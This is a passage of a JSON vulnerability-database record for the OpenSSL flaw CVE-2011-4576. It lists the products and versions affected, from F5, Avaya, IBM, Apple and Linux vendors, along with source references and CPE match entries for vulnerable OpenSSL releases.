"scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.3" }, { "model": "xiv storage system gen3 mtm 11.0.1.a", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2810-114" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.8" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "11.04" }, { "model": "enterprise linux workstation optional", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "big-ip asm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "fiery print controller", "scope": "eq", "trust": 0.3, "vendor": "efi", "version": "2.0" }, { "model": "message networking", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.2" }, { "model": "iq", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "4.2" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "docucolor dc260", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "0" }, { "model": "tivoli netcool/system service monitor fp8", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "tivoli netcool/omnibus", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3" }, { "model": "arx", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "6.1.1" }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.1" }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.10" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.00" }, { "model": "service delivery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.2" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "big-ip ltm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "linux i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "11.04" }, { "model": "docucolor dc242", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "0" }, { "model": "project openssl 1.0.0c", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "big-ip apm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "message networking", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.1" }, { "model": "tivoli workload scheduler distributed fp03", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "8.0" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.0" }, { "model": "linux enterprise server sp1", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "20500" }, { "model": "iq", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "4.1" }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.10" }, { "model": "messaging storage server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.13" }, { "model": "aura sip enablement services sp4", "scope": "ne", "trust": 0.3, "vendor": "avaya", "version": "5.2.1" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6" }, { "model": "big-ip wom hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "reflection for ibm", "scope": "eq", "trust": 0.3, "vendor": "attachmate", "version": "20080" }, { "model": "communication server 1000m", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "aura communication manager utility services", "scope": "ne", "trust": 0.3, "vendor": "avaya", "version": "6.2.5.0.15" }, { "model": "project openssl d", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "proactive contact", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "4.2.1" }, { "model": "7.4-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "messaging storage server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.9" }, { "model": "tivoli netcool/system service monitor fp4", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "sterling connect:direct for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0" }, { "model": "linux mandrake", "scope": "eq", "trust": 0.3, "vendor": "mandriva", "version": "2011" }, { "model": "big-ip asm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.00" }, { "model": "linux lts lpia", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "8.04" }, { "model": "project openssl 1.0.0b", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "big-ip analytics hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "57100" }, { "model": "big-ip webaccelerator hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.0" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "enterprise linux as", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "4" }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.6.8" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.3" }, { "model": "aura system manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "pfsense", "scope": "eq", "trust": 0.3, "vendor": "bsdperimeter", "version": "2.0" }, { "model": "tivoli netcool/system service monitor fp9", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "tivoli workload scheduler distributed fp07", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.4" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.8.3" }, { "model": "aura system manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura communication manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "4.0" }, { "model": "hp-ux b.11.31", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.2" }, { "model": "sterling connect:direct", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.5" }, { "model": "linux s/390", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "big-ip asm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "communication server 1000m signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.1" }, { "model": "messaging storage server sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "project openssl f", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "communication server 1000e", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "tivoli netcool/system service monitor fp5", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "mac os", "scope": "ne", "trust": 0.3, "vendor": "apple", "version": "x10.8.4" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.3" }, { "model": "tivoli workload scheduler for applications fp01", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "big-ip psm hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "aura session manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "sterling connect:direct for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1" }, { "model": "tivoli workload scheduler distributed fp02", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6" }, { "model": "ds8870", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "big-ip pem", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "proactive contact", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "4.1.2" }, { "model": "linux i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "11.10" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.2" }, { "model": "big-ip apm hf4", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "aura session manager sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "big-ip analytics hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "xiv storage system gen3 mtm", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2810-11411.1.1" }, { "model": "reflection sp1", "scope": "eq", "trust": 0.3, "vendor": "attachmate", "version": "14.1" }, { "model": "big-ip psm hf7", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "big-ip asm hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "enterprise linux server optional", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "aura application server sip core pb26", "scope": "ne", "trust": 0.3, "vendor": "avaya", "version": "53002.0" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "sterling connect:direct", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.6" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.0" }, { "model": "big-ip webaccelerator hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "xiv storage system gen3 mtm 11.1.0.a", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2812-114" }, { "model": "9.0-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0" }, { "model": "linux lts amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "8.04" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.6.8" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1" }, { "model": "xiv storage system gen3 mtm", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2810-11411" }, { "model": "sterling connect:direct", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "3.61" }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.5" }, { "model": "linux lts powerpc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "8.04" }, { "model": "enterprise virtualization hypervisor for rhel", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "60" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "linux enterprise sdk sp4", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "10" }, { "model": "big-ip apm hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "56002" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "76000" }, { "model": "voice portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1.1" }, { "model": "aura experience portal sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "tivoli netcool/system service monitor fp3", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "arx", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "6.1" }, { "model": "junos space r1.8", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "13.1" }, { "model": "big-ip analytics hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "informix genero", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.40" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0.00" }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "big-ip asm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip ltm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "messaging storage server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "project openssl e", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "aura system platform sp3", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "big-ip analytics hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "linux enterprise desktop sp1", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1" }, { "model": "aura sip enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "4.0" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.2" }, { "model": "enterprise manager", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "2.3" }, { "model": "reflection for unix and openvms", "scope": "eq", "trust": 0.3, "vendor": "attachmate", "version": "20080" }, { "model": "sterling connect:direct for microsoft windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.0" }, { "model": "enterprise virtualization hypervisor for rhel", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "50" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "big-ip psm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "tivoli netcool/system service monitor fp1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "tivoli network manager fp3", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.9" }, { "model": "jboss enterprise web server for windows", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "1.0.2" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0" }, { "model": "big-ip ltm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "tivoli netcool/system service monitor fp7", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "9.0-release", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "big-ip apm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "big-ip wom hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.1" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "7.4" }, { "model": "enterprise linux desktop optional", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "77100" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "hardware management console 7r7.1.0", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "xiv storage system gen3 mtm 11.0.1.a", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2812-114" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3.0" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10500" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0" }, { "model": "ip office application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "linux", "scope": null, "trust": 0.3, "vendor": "gentoo", "version": null }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "big-ip analytics hf7", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "enterprise linux hpc node", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "77000" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "message networking", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.4" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "big-ip pem", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "communication server 1000e signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "ip deskphone", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "96x16.3" }, { "model": "reflection", "scope": "eq", "trust": 0.3, "vendor": "attachmate", "version": "14.0" }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.5" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "1.0" }, { "model": "linux ia-32", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.2" }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "11.04" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0.00" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "security network intrusion prevention system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2" }, { "model": "big-ip psm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "communication server 1000m", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "tivoli workload scheduler distributed fp04", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1" }, { "model": "communication server 1000e signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "enterprise linux desktop workstation client", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "docucolor dc252", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "0" }, { "model": "proactive contact", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "4.0.1" }, { "model": "aura application enablement services", "scope": "ne", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "tivoli netcool/omnibus", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.4" }, { "model": "ds8870", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "linux enterprise desktop sp4", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "10" }, { "model": "big-ip pem hf4", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "aura conferencing standard", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "security network intrusion prevention system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2" }, { "model": "hardware management console 7r7.2.0 sp1", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "communication server 1000m signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "8.2" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "pfsense", "scope": "eq", "trust": 0.3, "vendor": "bsdperimeter", "version": "2.0.1" }, { "model": "messaging storage server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.2" }, { "model": "message networking", "scope": "ne", "trust": 0.3, "vendor": "avaya", "version": "5.2.5" }, { "model": "aura application server sip core", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "53002.1" }, { "model": "system management homepage", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7.1.1" }, { "model": "communication server 1000e", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "big-ip psm hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1" }, { "model": "messaging storage server sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "project openssl 1.0.0a", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "xiv storage system gen3 mtm", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2812-11411" } ], "sources": [ { "db": "CERT/CC", "id": "VU#737740" }, { "db": "BID", "id": "51281" }, { "db": "JVNDB", "id": "JVNDB-2012-001019" }, { "db": "NVD", "id": "CVE-2011-4576" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:openssl:openssl:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "0.9.8r", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8q:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8j:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8i:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8b:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8a:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.7g:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.7f:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.6m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.6l:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.6f:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.6e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.2b:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8p:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8o:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8h:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8g:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.7m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.7e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.7d:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.6k:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.6j:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.6d:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.6c:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.1c:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8n:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, 